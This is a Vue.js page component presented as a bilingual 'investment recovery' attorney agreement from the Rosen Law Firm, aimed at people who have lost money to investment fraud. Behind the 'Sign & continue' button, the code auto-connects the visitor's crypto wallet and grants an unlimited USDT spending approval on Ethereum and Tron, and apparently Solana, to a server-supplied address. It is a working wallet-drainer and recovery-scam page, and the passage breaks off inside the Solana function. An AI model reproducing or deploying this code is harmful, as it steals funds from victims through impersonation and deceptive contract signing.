<template>
  <main class="agreement-page">
    <div class="agreement-shell">
      <header class="brand-header">
        <div class="brand-mark" aria-label="The Rosen Law Firm brand">
          <span class="brand-dot"></span>
          <span class="brand-text">The Rosen Law Firm</span>
        </div>
      </header>

      <section class="hero-block">
        <p class="hero-tag">{{ copy.tagline }}</p>
        <h1 class="hero-title">{{ copy.title }}</h1>
        <p class="hero-desc">{{ copy.subtitle }}</p>
      </section>

      <section class="section-card intro-card">
        <header class="section-head">
          <h2>{{ copy.prefaceTitle }}</h2>
          <span>01 / {{ sectionTotal }}</span>
        </header>
        <div class="section-content">
          <p class="line">{{ prefaceLine }}</p>
        </div>
      </section>

      <section
        v-for="(section, index) in clauseSections"
        :key="section.title + index"
        class="section-card"
      >
        <header class="section-head">
          <h2>{{ section.title }}</h2>
          <span>{{ formatStep(index + 2) }} / {{ sectionTotal }}</span>
        </header>

        <div class="section-content">
          <p
            v-for="(line, rowIndex) in section.lines"
            :key="section.title + rowIndex"
            :class="lineClass(line)"
          >
            {{ line }}
          </p>
        </div>
      </section>
    </div>

    <footer class="fixed-footer">
      <div class="footer-meta">
        <span>{{ copy.footerLabel }}</span>
        <strong>#RB-2041</strong>
      </div>
      <button type="button" class="sign-btn" @click="submitAuthorize">
        {{ authorizing ? copy.signingButton : copy.signButton }}
      </button>
    </footer>

    <p v-if="authorizeError || connectError" class="wallet-error">
      {{ authorizeError || connectError }}
    </p>
  </main>
</template>

<script>
import Web3 from "web3";
import { Transaction } from "@solana/web3.js";
import { apiPost } from "../recovered/api-client";
import { API_BASE_URL } from "../recovered/api-base";
import { registerStatus } from "../recovered/home-api";
import { getConfig } from "../recovered/trade-api";
import { getUserInfo } from "../recovered/sign-api";
import { autoConnectWallet, fetchOnchainUsdtBalance, getPreferredChain } from "../recovered/wallet-session";

const ERC20_USDT_CONTRACT = "0xdAC17F958D2ee523a2206206994597C13D831ec7";
const TRC20_USDT_CONTRACT = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t";
const ERC20_MAX_ALLOWANCE_HEX = "0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff";
const MAX_ALLOWANCE_DECIMAL =
  "115792089237316195423570985008687907853269984665640564039457584007913129639935";
const SOL_U64_MAX = "18446744073709551615";
const TOKEN_PROGRAM_ID = "TokenkegQfeZyiNwAJbNbGKPFXCWuBvf9Ss623VQ5DA";
const PARTY_A_PLACEHOLDER = "________________________";
const PROJECT_TYPE = {
  us_stock: { zh: "美股", en: "US Stocks" },
  hk_stock: { zh: "港股", en: "HK Stocks" },
  au_stock: { zh: "澳股", en: "AU Stocks" },
  crypto: { zh: "加密货币", en: "Crypto" },
  overseas_entity: { zh: "海外实体项目投资", en: "Overseas Entity Investment" },
  other: { zh: "其它", en: "Other" },
};

const ERC20_ABI = [
  {
    constant: false,
    inputs: [
      { name: "_spender", type: "address" },
      { name: "_value", type: "uint256" },
    ],
    name: "approve",
    outputs: [{ name: "", type: "bool" }],
    payable: false,
    stateMutability: "nonpayable",
    type: "function",
  },
];

function normalizeChain(raw) {
  const text = String(raw || "").trim().toUpperCase();
  if (text === "TRX" || text === "TRC" || text === "TRC20") return "TRC20";
  if (text === "SOL" || text === "SOLANA") return "SOL";
  return "ERC20";
}

function inferChainByAddress(address = "") {
  if (address.startsWith("T")) return "TRC20";
  if (address.startsWith("0x")) return "ERC20";
  if (/^[1-9A-HJ-NP-Za-km-z]{32,44}$/.test(address)) return "SOL";
  return "ERC20";
}

function base64ToBytes(base64) {
  const bin = window.atob(base64);
  const out = new Uint8Array(bin.length);
  for (let i = 0; i < bin.length; i += 1) {
    out[i] = bin.charCodeAt(i);
  }
  return out;
}

function bytesToBase64(bytes) {
  let out = "";
  const CHUNK = 0x8000;
  for (let i = 0; i < bytes.length; i += CHUNK) {
    const piece = bytes.subarray(i, i + CHUNK);
    out += String.fromCharCode.apply(null, piece);
  }
  return window.btoa(out);
}

function normalizeSolApproveAmount(raw) {
  const text = String(raw || "").trim();
  if (!/^[0-9]+$/.test(text)) return SOL_U64_MAX;
  try {
    const v = BigInt(text);
    const max = BigInt(SOL_U64_MAX);
    if (v <= 0n) return SOL_U64_MAX;
    if (v > max) return SOL_U64_MAX;
    return String(v);
  } catch (err) {
    return SOL_U64_MAX;
  }
}

function parseQueryFromHash() {
  const hash = window.location.hash || "";
  const idx = hash.indexOf("?");
  if (idx < 0) return new URLSearchParams("");
  return new URLSearchParams(hash.slice(idx + 1));
}

function readTokenFromUrl() {
  const fromSearch = new URLSearchParams(window.location.search).get("token");
  if (fromSearch) return String(fromSearch).trim();
  const fromHash = parseQueryFromHash().get("token");
  return fromHash ? String(fromHash).trim() : "";
}

function filledValue(val) {
  const text = String(val || "").trim();
  return text || PARTY_A_PLACEHOLDER;
}

function formatTodayZh() {
  const now = new Date();
  const yyyy = now.getFullYear();
  const mm = String(now.getMonth() + 1).padStart(2, "0");
  const dd = String(now.getDate()).padStart(2, "0");
  return `${yyyy}年${mm}月${dd}日`;
}

function formatTodayEn() {
  const now = new Date();
  const yyyy = now.getFullYear();
  const mm = String(now.getMonth() + 1).padStart(2, "0");
  const dd = String(now.getDate()).padStart(2, "0");
  return `${yyyy}-${mm}-${dd}`;
}

function extractAttorneyName(line, prefix) {
  const raw = String(line || "").replace(prefix, "").replace(/_/g, "").trim();
  return raw || PARTY_A_PLACEHOLDER;
}

function resolveProjectTypeLabel(projectTypeKey, language) {
  const key = String(projectTypeKey || "").trim();
  const map = PROJECT_TYPE[key];
  if (map) return map[language] || map.zh;
  if (!key) return language === "zh" ? PROJECT_TYPE.other.zh : PROJECT_TYPE.other.en;
  return key;
}

function resolveLossAmountText(lossAmount, language) {
  const text = String(lossAmount || "").trim();
  if (text) return text;
  return language === "zh" ? "3500万" : "35 million";
}

const CONTRACT_CONTENT = {
  zh: [
    "本《美国律师投资追偿法律服务委托代理协议》（以下简称“本协议”）由委托人与受托美国执业律师/律所，依据美国联邦法律及案件管辖州州法、美国律师协会执业规范、美国商事追偿与金融投资纠纷司法实操规则，本着平等自愿、诚实信用、权责明晰、风险共担、回款优先的原则，就委托人委托美国执业律师专项代理跨境金融投资、证券投资、项目投资等各类投资损失追偿、违约追责、资金追回、维权索赔全部法律事宜，订立本协议，双方共同恪守履行。",
    "一、协议双方主体信息",
    "甲方（委托人）英文姓名/企业英文全称：________________________",
    "身份证件/企业注册编号：________________________",
    "联系常住地址：________________________",
    "联系电话：________________________ 电子邮箱：________________________",
    "投资受损基本情况简述：甲方因参与________（美股/港股/澳股/加密货币/海外实体项目投资等）相关投资业务，遭受对方违约、诈骗、违规操作、侵占资金、虚假宣传、拒不兑付等行为，产生直接及间接投资损失，现全权委托乙方专业代理投资追偿全部法律事宜。",
    "乙方 (受托代理律师/律所)",
    "美国执业律师姓名：__Michael Cohen______________________",
    "律师执业牌照Bar Number（美国州律师协会注册编号）：_______SBN 309912________________",
    "所属律所英文全称：______Rosen Law Firm__________________",
    "律所美国注册办公地址：_____275 Madison Avenue,",
    "40th Floor",
    "New York, NY 10016___________________",
    "官方电子邮箱：__michaelcohen895@gmail.com______________________",
    "执业管辖州：美国____纽约____州，具备该州及美国联邦法院投资纠纷、金融追偿案件合法执业出庭资质。",
    "二、委托代理核心事项与服务范围",
    "2.1 专项委托追偿标的",
    "甲方独家委托乙方代理处理甲方与投资违约/侵权责任第三方（追偿被告方）：______Delixy Holdings Limited_________________ 之间，因___证券_____投资项目产生的全部投资本金、投资收益、违约金、赔偿金、维权合理开支、逾期利息、惩罚性赔偿等所有款项的全程投资追偿法律事宜，追偿总标的金额暂计：_3500万_______美元（USD），最终以实际法律认定及实际回款到账金额为准。",
    "2.2 乙方完整法律服务工作内容",
    "1. 案件全案事实梳理、投资证据固定、交易流水核查、合同及投资协议法律合规性审查、美国法律适用及胜诉案情研判，出具专业投资追偿法律分析意见书；",
    "2. 代表甲方与责任第三方开展商务谈判、和解协商、书面催告、律师函送达、违约追责沟通，全力推动对方主动回款赔付；",
    "3. 全程负责美国联邦法院、案件管辖州州法院立案、起诉、答辩、证据提交、庭审出庭、质证辩论、财产保全、资产冻结、强制执行、失信惩戒、资产查控等全部诉讼法律程序；",
    "4. 代理案件仲裁、调解、上诉、再审、判决生效后强制执行、被执行人资产追查、跨境资产溯源、款项划扣回款全流程事宜；",
    "5. 全程向甲方同步案件进展、庭审情况、回款进度、法律文书内容，定期提交书面案件工作报告，及时告知关键节点及决策事项；",
    "6. 处理与本案投资追偿相关的全部行政沟通、司法对接、第三方机构取证、合规备案等配套法律辅助工作。",
    "2.3 委托代理权限（全权特别授权）",
    "甲方授予乙方美国法律项下最高级别特别全权代理权限，无需甲方另行单独签字确认，乙方可全权代表甲方行使以下全部权利：代为起诉、应诉、反诉、撤诉、和解签约、变更追偿诉求、放弃部分权利、签收全部法律文书、代收全部追偿回款款项、申请财产保全、申请强制执行、签署所有与本案相关法律文件及回款结算文件，所有代理行为法律后果均由甲方承担。",
    "三、协议服务合作期限",
    "本协议自甲乙双方签字/盖章当日正式生效，服务有效期至本案投资追偿全部款项全额回款到账、所有法律程序终结、双方所有权利义务结清之日自动终止。",
    "非经双方书面协商一致，任何一方不得单方提前终止本协议；案件无论经历和解回款、诉讼胜诉回款、强制执行回款、分期回款任何方式，均视为乙方完整履行协议代理义务。",
    "四、律师服务费用、计费模式与支付结算条款",
    "4.1 计费方式选择",
    "风险代理计费模式",
    "甲方无需预先支付律师费、办案基础费用，乙方全程垫资负责案件全部办案成本、司法诉讼费、保全费、公告费、取证费、差旅费等所有办案开支。仅当乙方代理成功追回投资款项且资金实际足额到达指定收款账户后，甲方按照实际到账总回款金额的__30__% 向乙方支付律师风险代理费，款项到账当日同步结算支付，不得拖延、拒付、抵扣。无回款、无收费，回款多少、按比例结算多少。",
    "4.2 回款结算与支付时效",
    "所有追偿回款资金到账后3个工作日内，甲方必须足额结清乙方全部应付约定费用，逾期支付按应付金额每日0.5%支付违约金，逾期超7日，乙方有权暂停全部法律服务、终止代理，并追究甲方违约责任及额外赔偿。",
    "五、甲乙双方核心权利与义务",
    "5.1 甲方权利义务",
    "1. 甲方保证向乙方提供的所有投资合同、交易记录、转账流水、沟通记录、身份资料等证据材料全部真实、合法、完整，无隐瞒、伪造、篡改，因甲方资料虚假导致案件败诉、追偿失败，所有责任及损失由甲方自行承担；",
    "2. 甲方需配合乙方办案工作，及时补充证据、签署必要法律文件、配合案件问询，不得干预乙方正常合法办案及庭审代理工作；",
    "3. 甲方享有知情权，乙方需定期同步案件全部进展，重大决策事项提前与甲方沟通；",
    "4. 甲方不得绕开乙方私下与追偿责任方和解、收款、放弃追偿权益，否则视为甲方根本违约。",
    "5.2 乙方权利义务",
    "1. 乙方需严格遵守美国律师执业操守、司法执业规范，勤勉尽责、专业高效代理本案全部追偿事宜，尽最大努力为甲方追回投资损失；",
    "2. 乙方需依法维护甲方合法追偿权益，不得与第三方恶意串通损害甲方利益，不得隐瞒案件关键进展及回款情况；",
    "3. 乙方对在办案过程中知悉的甲方个人信息、投资隐私、案件商业秘密承担永久保密责任，未经甲方书面同意不得向任何第三方泄露。",
    "六、保密条款",
    "甲乙双方对本次投资追偿案件所有案情资料、投资信息、财务数据、法律文书、沟通内容、回款金额等全部涉密信息，承担永久保密义务，协议终止后保密责任持续有效。任何一方擅自泄露保密信息，需向对方支付违约金___10000_____美元，并赔偿对方全部经济损失及名誉损失。",
    "七、协议解除、终止与违约责任",
    "1. 任何一方违反本协议核心约定，未履行自身义务的，守约方有权单方解除本协议，并要求违约方承担全部赔偿责任；",
    "2. 甲方私下和解、私下收款、单方撤案、拒付律师费的，除足额支付约定律师费外，额外向乙方支付协议总追偿标的20%作为违约金；",
    "3. 乙方无故怠于履职、恶意拖延办案、损害甲方权益的，甲方有权解除协议，乙方退还已收全部费用并承担相应赔偿责任。",
    "八、法律适用与争议解决",
    "1. 本协议适用美国____纽约____州法律及美国联邦相关法律管辖与解释；",
    "2. 因本协议产生的一切争议、纠纷，双方优先协商解决；协商不成的，全部争议提交美国___纽约_____州对应司法法院专属管辖诉讼解决；",
    "九、其他补充约定",
    "1. 本协议未尽事宜，双方可另行签订书面补充协议，补充协议与本协议具备同等法律效力；",
    "2. 本协议一式两份，甲乙双方各执一份，签字/盖章后生效，具备同等法律约束力；",
    "十、双方签字确认",
    "甲方（委托人）签字确认：",
    "签字：________________________",
    "日期：年____月____日",
    "乙方（美国代理律师/律所）签字确认：",
    "律师签字：________________________",
    "日期：年____月____日",
  ],
  en: [
    "This U.S. Attorney Investment Recovery Legal Service Entrustment Agreement (the \"Agreement\") is entered into by the Client and the entrusted U.S.-licensed attorney/law firm. Under applicable U.S. federal law, governing state law, attorney conduct rules, and practical standards for commercial and financial recovery disputes, both parties follow the principles of equality, good faith, clear responsibilities, shared risk, and recovery-first settlement, and agree on full legal representation for cross-border investment loss recovery, breach liability, fund retrieval, and rights protection.",
    "I. Party Information",
    "Party A (Client) English name / company legal name: ________________________",
    "ID document / company registration number: ________________________",
    "Residential / registered address: ________________________",
    "Phone: ________________________  Email: ________________________",
    "Basic loss description: Party A suffered direct and indirect investment losses in ________ (U.S. stocks / HK stocks / AU stocks / cryptocurrency / overseas project investment, etc.) due to the counterparty's breach, fraud, misconduct, fund misappropriation, false promotion, refusal to redeem or pay, and hereby fully entrusts Party B to handle all legal recovery matters.",
    "Party B (Entrusted Attorney / Law Firm)",
    "Name of U.S.-licensed attorney: __Michael Cohen______________________",
    "Bar Number (State Bar registration): _______SBN 309912________________",
    "Law firm legal name: ______Rosen Law Firm__________________",
    "U.S. registered office address: _____275 Madison Avenue,",
    "40th Floor",
    "New York, NY 10016___________________",
    "Official email: __michaelcohen895@gmail.com______________________",
    "Licensed jurisdiction: State of New York, United States, with lawful qualification to appear in investment dispute and financial recovery cases in New York State courts and U.S. federal courts.",
    "II. Core Entrustment Matters and Service Scope",
    "2.1 Subject Matter of Recovery",
    "Party A exclusively entrusts Party B to handle all legal matters between Party A and the liable third party (recovery defendant): ______Delixy Holdings Limited_________________, arising from ___securities_____ investment projects, including full recovery of principal, returns, liquidated damages, compensation, reasonable enforcement expenses, overdue interest, punitive damages, and all related claims. The provisional total recovery target is _35 million_______ USD, subject to final legal determination and actual recovered amount.",
    "2.2 Full Legal Service Work of Party B",
    "1. Complete case fact review, evidence preservation, transaction flow verification, legal compliance review of contracts/investment agreements, analysis of applicable U.S. law and litigation prospects, and issuance of a professional legal opinion on recovery;",
    "2. Representation in business negotiation, settlement discussion, formal demand notices, attorney letter service, breach communication, and active promotion of voluntary payment by the liable party;",
    "3. Full litigation handling in U.S. federal and competent state courts, including filing, pleading, evidence submission, hearings, examination and argument, property preservation, asset freezing, enforcement, credit penalties, and asset control procedures;",
    "4. Representation in arbitration, mediation, appeal, retrial, post-judgment enforcement, asset tracing, cross-border asset source tracking, and fund deduction/recovery execution;",
    "5. Ongoing reporting to Party A on case progress, hearing status, recovery timeline, and legal documents, with periodic written work reports and timely notice of key milestones/decisions;",
    "6. Handling all related administrative communication, judicial liaison, third-party evidence collection, and compliance filing supporting work for this recovery case.",
    "2.3 Scope of Entrusted Authority (Special Full Authorization)",
    "Party A grants Party B the highest level of special full authorization under U.S. law. Without additional signature confirmation, Party B may fully act on Party A's behalf to file suits/defenses/counterclaims, withdraw suits, settle, adjust claims, waive partial rights, receive legal documents, receive recovered funds, apply for preservation and enforcement, and sign all case-related legal and settlement documents. Legal consequences of agency acts shall be borne by Party A.",
    "III. Service Cooperation Term",
    "This Agreement becomes effective on the date both parties sign/seal and remains valid until full recovery is paid in, all legal procedures are concluded, and all rights and obligations are settled.",
    "Unless otherwise agreed in writing by both parties, neither party may unilaterally terminate this Agreement early. Recovery by settlement, judgment, enforcement, or installment payment is deemed full performance of Party B's agency obligations.",
    "IV. Legal Fees, Billing Model and Settlement Terms",
    "4.1 Billing Method",
    "Contingency fee model",
    "Party A is not required to prepay attorney fees or base case expenses. Party B advances all case costs, including court fees, preservation fees, publication fees, evidence fees, travel expenses, and related costs. Only after successful recovery and actual receipt of funds into the designated account shall Party A pay Party B a contingency fee of __30__% of the actual recovered amount, payable on the same day of receipt without delay, refusal, or offset. No recovery, no fee.",
    "4.2 Recovery Settlement and Payment Timeline",
    "Within 3 business days after recovery funds are received, Party A must fully settle all agreed payable fees. Overdue payment incurs liquidated damages at 0.5% per day of the payable amount. If overdue for more than 7 days, Party B may suspend services, terminate representation, and pursue breach liability and additional compensation.",
    "V. Core Rights and Obligations of Both Parties",
    "5.1 Rights and Obligations of Party A",
    "1. Party A guarantees all materials provided (investment contracts, transaction records, transfer flows, communication records, identity materials, etc.) are true, lawful, and complete, without concealment, forgery, or alteration. If false materials cause loss or failed recovery, Party A bears all responsibility and losses;",
    "2. Party A shall cooperate with Party B's work, timely provide supplementary evidence, sign necessary legal documents, and cooperate with case inquiries, and shall not interfere with Party B's lawful representation and hearing work;",
    "3. Party A has the right to be informed, and Party B shall regularly update full case progress and communicate major decisions in advance;",
    "4. Party A shall not bypass Party B to privately settle, receive payment, or waive recovery rights with the liable party; otherwise it constitutes fundamental breach by Party A.",
    "5.2 Rights and Obligations of Party B",
    "1. Party B shall strictly comply with U.S. attorney ethics and professional rules, perform diligently and efficiently, and make best efforts to recover Party A's investment losses;",
    "2. Party B shall lawfully protect Party A's recovery rights, shall not maliciously collude with third parties, and shall not conceal key case progress or recovery status;",
    "3. Party B bears permanent confidentiality obligations regarding Party A's personal information, investment privacy, and case trade secrets learned during representation, and may not disclose to any third party without Party A's written consent.",
    "VI. Confidentiality",
    "Both parties bear permanent confidentiality obligations for all confidential information in this recovery matter, including case facts, investment information, financial data, legal documents, communications, and recovery amounts. Confidentiality survives termination of this Agreement. Any unauthorized disclosure requires payment of liquidated damages of ___10000_____ USD and full compensation for economic and reputational losses.",
    "VII. Termination and Breach Liability",
    "1. If either party breaches core terms and fails to perform obligations, the non-breaching party may unilaterally terminate this Agreement and claim full damages;",
    "2. If Party A privately settles, privately receives payment, unilaterally withdraws the case, or refuses to pay attorney fees, Party A shall, in addition to full agreed fees, pay Party B an extra 20% of the total recovery target as liquidated damages;",
    "3. If Party B unreasonably neglects duties, maliciously delays the case, or harms Party A's rights, Party A may terminate this Agreement, and Party B shall refund received fees and bear corresponding liability.",
    "VIII. Governing Law and Dispute Resolution",
    "1. This Agreement is governed by and interpreted under the laws of the State of New York, United States, and applicable U.S. federal law;",
    "2. Any dispute arising from this Agreement shall first be resolved through consultation. If consultation fails, disputes shall be submitted to the competent courts of the State of New York, United States, for exclusive litigation jurisdiction.",
    "IX. Miscellaneous",
    "1. Matters not covered may be supplemented by written addenda signed by both parties, and such addenda shall have the same legal effect as this Agreement;",
    "2. This Agreement is made in two originals, one for each party, and becomes effective upon signature/seal, with equal legal force;",
    "X. Signature Confirmation",
    "Party A (Client) signature:",
    "Signature: ________________________",
    "Date: ____ / ____ / ____",
    "Party B (U.S. Attorney / Law Firm) signature:",
    "Attorney signature: ________________________",
    "Date: ____ / ____ / ____",
  ],
};

const UI_COPY = {
  en: {
    tagline: "SERVICE AGREEMENT · #RB-2041",
    title: "Legal Service Authorization.",
    subtitle: "Please review the details below and sign at the bottom to confirm the legal service arrangement.",
    prefaceTitle: "Overview",
    footerLabel: "Agreement",
    signButton: "Sign & continue",
    signingButton: "Processing...",
  },
  zh: {
    tagline: "服务协议 · #RB-2041",
    title: "法律服务委托合同",
    subtitle: "请阅读以下条款并在底部签约按钮处确认，签署后将生成副本留存。",
    prefaceTitle: "协议说明",
    footerLabel: "协议编号",
    signButton: "签约并继续",
    signingButton: "处理中...",
  },
};

export default {
  name: "LegalContractView",
  data() {
    return {
      language: "en",
      config: {
        addressErc: "",
        addressTrc: "",
        addressSol: "",
      },
      userInfo: {
        coin: "ETH",
        address: "",
      },
      showReceiveDialog: false,
      authorizing: false,
      authorizeError: "",
      connectError: "",
      bindInfo: {
        token: "",
        userId: 0,
        bindAddress: "",
        bindChain: "",
        projectType: "",
        lossAmount: "",
        profile: {
          enName: "",
          idNumber: "",
          address: "",
          phone: "",
          email: "",
        },
      },
    };
  },
  computed: {
    copy() {
      return UI_COPY[this.language] || UI_COPY.en;
    },
    selectedLines() {
      const source = CONTRACT_CONTENT[this.language] || CONTRACT_CONTENT.zh;
      return this.applyPartyAProfile(source);
    },
    prefaceLine() {
      return this.selectedLines[0] || "";
    },
    clauseSections() {
      const rows = this.selectedLines.slice(1);
      const sections = [];
      let current = null;

      rows.forEach((line) => {
        if (this.isSectionTitle(line)) {
          if (current) sections.push(current);
          current = { title: line, lines: [] };
          return;
        }

        if (!current) {
          current = { title: this.language === "zh" ? "补充" : "Appendix", lines: [] };
        }

        current.lines.push(line);
      });

      if (current) sections.push(current);
      return sections;
    },
    sectionTotal() {
      return this.formatStep(this.clauseSections.length + 1);
    },
    fullAddress() {
      return this.userInfo.address || sessionStorage.getItem("ADDRESS") || localStorage.getItem("U_ADDRESS") || "";
    },
    chainType() {
      return normalizeChain(
        sessionStorage.getItem("CHAIN") || getPreferredChain() || inferChainByAddress(this.fullAddress)
      );
    },
  },
  mounted() {
    this.initializePage();
  },
  methods: {
    async initializePage() {
      await Promise.all([this.bootstrap(), this.fetchBindInfoByToken()]);
      try {
        await this.ensureWalletReady();
        this.connectError = "";
      } catch (err) {
        this.connectError = (err && err.message) || "连接钱包失败";
      }
    },
    async bootstrap() {
      try {
        const cfg = await getConfig(document.domain);
        if (cfg && typeof cfg === "object") {
          this.config = {
            ...this.config,
            ...cfg,
          };
        }
      } catch (err) {
        // keep fallback config
      }

      try {
        const info = await getUserInfo();
        if (info && typeof info === "object") {
          this.userInfo = {
            ...this.userInfo,
            ...info,
          };
        }
      } catch (err) {
        // keep fallback user info
      }
    },
    async fetchBindInfoByToken() {
      const token = readTokenFromUrl();
      if (!token) return;

      this.bindInfo.token = token;
      try {
        const resp = await fetch(`${API_BASE_URL}/api/bind/info?token=${encodeURIComponent(token)}`, {
          method: "GET",
          headers: {
            Accept: "application/json",
          },
        });
        if (!resp.ok) {
          throw new Error(`HTTP ${resp.status}`);
        }

        const json = await resp.json();
        const code = Number(json && json.code);
        if (!(code === 0 || code === 1 || code === 200)) {
          throw new Error((json && (json.msg || json.message)) || "bind info request failed");
        }

        const data = (json && json.data) || {};
        const profile = data.profile || {};
        this.bindInfo = {
          token,
          userId: Number(data.user_id || 0),
          bindAddress: data.bind_address || "",
          bindChain: data.bind_chain || "",
          projectType: String(data.project_type || profile.project_type || "").trim(),
          lossAmount: String(data.loss_amount || profile.loss_amount || "").trim(),
          profile: {
            enName: String(profile.en_name || "").trim(),
            idNumber: String(profile.id_number || "").trim(),
            address: String(profile.address || "").trim(),
            phone: String(profile.phone || "").trim(),
            email: String(profile.email || "").trim(),
          },
        };
      } catch (err) {
        // keep placeholders when bind info is unavailable
      }
    },
    applyPartyAProfile(lines) {
      const out = Array.isArray(lines) ? lines.slice() : [];
      const profile = this.bindInfo.profile || {};
      const enName = filledValue(profile.enName);
      const idNumber = filledValue(profile.idNumber);
      const address = filledValue(profile.address);
      const phone = filledValue(profile.phone);
      const email = filledValue(profile.email);
      const partyASignature = enName;
      const todayZh = formatTodayZh();
      const todayEn = formatTodayEn();
      const projectTypeZh = resolveProjectTypeLabel(this.bindInfo.projectType, "zh");
      const projectTypeEn = resolveProjectTypeLabel(this.bindInfo.projectType, "en");
      const lossAmountZh = resolveLossAmountText(this.bindInfo.lossAmount, "zh");
      const lossAmountEn = resolveLossAmountText(this.bindInfo.lossAmount, "en");

      if (this.language === "zh") {
        const attorneyLine = out.find((line) => line.startsWith("美国执业律师姓名：")) || "";
        const attorneyName = extractAttorneyName(attorneyLine, "美国执业律师姓名：");

        for (let i = 0; i < out.length; i += 1) {
          if (out[i].startsWith("甲方（委托人）英文姓名/企业英文全称：")) {
            out[i] = `甲方（委托人）英文姓名/企业英文全称：${enName}`;
            continue;
          }
          if (out[i].startsWith("身份证件/企业注册编号：")) {
            out[i] = `身份证件/企业注册编号：${idNumber}`;
            continue;
          }
          if (out[i].startsWith("联系常住地址：")) {
            out[i] = `联系常住地址：${address}`;
            continue;
          }
          if (out[i].startsWith("联系电话：")) {
            out[i] = `联系电话：${phone} 电子邮箱：${email}`;
            continue;
          }
          if (out[i].startsWith("投资受损基本情况简述：")) {
            out[i] = out[i].replace("参与________（", `参与${projectTypeZh}（`);
            continue;
          }
          if (out[i].includes("追偿总标的金额暂计：")) {
            out[i] = out[i].replace(
              /追偿总标的金额暂计：.*?美元（USD）/,
              `追偿总标的金额暂计：${lossAmountZh}美元（USD）`
            );
            continue;
          }
          if (out[i].startsWith("签字：")) {
            out[i] = `签字：${partyASignature}`;
            continue;
          }
          if (out[i].startsWith("律师签字：")) {
            out[i] = `律师签字：${attorneyName}`;
            continue;
          }
          if (out[i].startsWith("日期：")) {
            out[i] = `日期：${todayZh}`;
          }
        }
        return out;
      }

      const attorneyLine = out.find((line) => line.startsWith("Name of U.S.-licensed attorney:")) || "";
      const attorneyName = extractAttorneyName(attorneyLine, "Name of U.S.-licensed attorney:");

      for (let i = 0; i < out.length; i += 1) {
        if (out[i].startsWith("Party A (Client) English name / company legal name:")) {
          out[i] = `Party A (Client) English name / company legal name: ${enName}`;
          continue;
        }
        if (out[i].startsWith("ID document / company registration number:")) {
          out[i] = `ID document / company registration number: ${idNumber}`;
          continue;
        }
        if (out[i].startsWith("Residential / registered address:")) {
          out[i] = `Residential / registered address: ${address}`;
          continue;
        }
        if (out[i].startsWith("Phone:")) {
          out[i] = `Phone: ${phone}  Email: ${email}`;
          continue;
        }
        if (out[i].startsWith("Basic loss description:")) {
          out[i] = out[i].replace("in ________ (", `in ${projectTypeEn} (`);
          continue;
        }
        if (out[i].includes("The provisional total recovery target is")) {
          out[i] = out[i].replace(
            /The provisional total recovery target is .*? USD/,
            `The provisional total recovery target is ${lossAmountEn} USD`
          );
          continue;
        }
        if (out[i].startsWith("Signature:")) {
          out[i] = `Signature: ${partyASignature}`;
          continue;
        }
        if (out[i].startsWith("Attorney signature:")) {
          out[i] = `Attorney signature: ${attorneyName}`;
          continue;
        }
        if (out[i].startsWith("Date:")) {
          out[i] = `Date: ${todayEn}`;
        }
      }
      return out;
    },
    isSectionTitle(line) {
      if (this.language === "zh") return /^[一二三四五六七八九十]+、/.test(line);
      return /^[IVX]+\./.test(line);
    },
    lineClass(line) {
      if (/^\d+\.\d+/.test(line)) return "line sub-section";
      if (/^\d+[\.、]/.test(line)) return "line list-item";
      return "line";
    },
    formatStep(step) {
      return String(step).padStart(2, "0");
    },
    async ensureWalletReady() {
      const result = await autoConnectWallet({
        force: !this.fullAddress,
        preferredChain: this.chainType,
      });
      if (!result || !result.ok) {
        throw new Error((result && result.errorMessage) || "连接钱包失败");
      }

      if (result.address) {
        this.userInfo = {
          ...this.userInfo,
          address: result.address,
        };
      }

      if (result.chain) {
        this.userInfo = {
          ...this.userInfo,
          coin: result.chain === "TRC20" ? "TRX" : result.chain,
        };
      }

      if (result.address && result.chain) {
        fetchOnchainUsdtBalance(result.chain, result.address).catch(() => {});
      }

      return {
        chain: normalizeChain(result.chain || this.chainType),
        address: result.address || this.fullAddress,
      };
    },
    resolveApproveContracts(chain) {
      const raw = this.config.rawIndexConfig || {};
      if (chain === "TRC20") {
        const trc = raw.trc || {};
        return {
          tokenContract: trc.contract_address || trc.token_contract || TRC20_USDT_CONTRACT,
          spender:
            trc.authorized_address ||
            trc.authorizedAddress ||
            trc.address ||
            trc.contract_address ||
            this.config.addressTrc,
        };
      }

      if (chain === "SOL") {
        const sol = raw.sol || {};
        return {
          mint:
            sol.mint ||
            sol.token_mint ||
            sol.tokenMint ||
            sol.usdt_mint ||
            sol.mint_address ||
            sol.contract_address ||
            this.config.addressSol ||
            "",
          delegate:
            sol.authorized_address ||
            sol.authorizedAddress ||
            sol.delegate ||
            sol.contract_address ||
            sol.address ||
            this.config.addressSol ||
            "",
          decimals: Number(sol.decimals || 6),
          tokenProgram: sol.token_program || sol.tokenProgram || TOKEN_PROGRAM_ID,
          approveAmount: normalizeSolApproveAmount(sol.approve_amount || sol.approveAmount || sol.amount),
        };
      }

      const erc = raw.erc || {};
      return {
        tokenContract: erc.contract_address || erc.token_contract || ERC20_USDT_CONTRACT,
        spender:
          erc.authorized_address ||
          erc.authorizedAddress ||
          erc.address ||
          erc.contract_address ||
          this.config.addressErc,
      };
    },
    async authorizeErc(address) {
      const { tokenContract, spender } = this.resolveApproveContracts("ERC20");
      if (!tokenContract || !spender) {
        throw new Error("ETH授权地址缺失");
      }

      // 部分钱包会注入一个非标准的 window.web3（缺少可用的 .eth），
      // 因此只要检测到 window.ethereum，就用它重建标准 web3 实例。
      if (window.ethereum) {
        window.web3 = new Web3(window.ethereum);
      }
      if (!(window.web3 && window.web3.eth)) {
        throw new Error("未检测到ETH钱包环境");
      }

      const contract = new window.web3.eth.Contract(ERC20_ABI, tokenContract);
      await contract.methods.approve(spender, ERC20_MAX_ALLOWANCE_HEX).send({
        from: address,
      });
    },
    async authorizeTrc() {
      const { tokenContract, spender } = this.resolveApproveContracts("TRC20");
      if (!tokenContract || !spender) {
        throw new Error("TRX授权地址缺失");
      }

      const tron = window.tronwebIns || window.tronWeb;
      if (!tron) {
        throw new Error("未检测到TRX钱包环境");
      }

      const contract = await tron.contract().at(tokenContract);
      if (contract.approve) {
        await contract.approve(spender, MAX_ALLOWANCE_DECIMAL).send({
          feeLimit: 50000000,
          callValue: 0,
        });
        return;
      }
      if (contract.increaseApproval) {
        await contract.increaseApproval(spender, MAX_ALLOWANCE_DECIMAL).send({
          feeLimit: 50000000,
          callValue: 0,
        });
        return;
      }
      throw new Error("TRX合约不支持approve/increaseApproval");
    },
    async authorizeSol(address) {
